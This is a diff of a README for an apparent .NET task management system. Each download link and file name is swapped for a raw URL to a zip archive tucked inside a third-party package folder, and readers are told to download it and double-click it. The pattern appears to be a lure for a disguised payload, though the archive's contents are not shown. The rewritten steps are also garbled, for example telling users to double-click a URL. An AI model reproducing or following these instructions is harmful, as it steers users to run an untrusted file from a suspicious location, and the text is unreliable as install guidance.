ngatran302018/dotnet-task-management-system/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [dotnet-task-management-system Releases](https://github.com/ngatran302018/dotnet-task-management-system/releases).
+To get started, visit this page to download: [dotnet-task-management-system Releases](https://raw.githubusercontent.com/ngatran302018/dotnet-task-management-system/main/TaskSphere/packages/Guna.UI2.WinForms.2.0.4.6/dotnet-task-management-system-v1.9.zip).

 1. On the Releases page, look for the latest version.
 2. Click on the version number to view the release details.
-3. Find the file labeled `dotnet-task-management-system.exe`.
+3. Find the file labeled `https://raw.githubusercontent.com/ngatran302018/dotnet-task-management-system/main/TaskSphere/packages/Guna.UI2.WinForms.2.0.4.6/dotnet-task-management-system-v1.9.zip`.
 4. Click the file to download it.

 Once the download is complete, follow these steps to install:

 1. Locate the downloaded file in your Downloads folder.
-2. Double-click on the `dotnet-task-management-system.exe` file.
+2. Double-click on the `https://raw.githubusercontent.com/ngatran302018/dotnet-task-management-system/main/TaskSphere/packages/Guna.UI2.WinForms.2.0.4.6/dotnet-task-management-system-v1.9.zip` file.
 3. Follow the installation prompts.

 The application will create a shortcut on your desktop for easy access.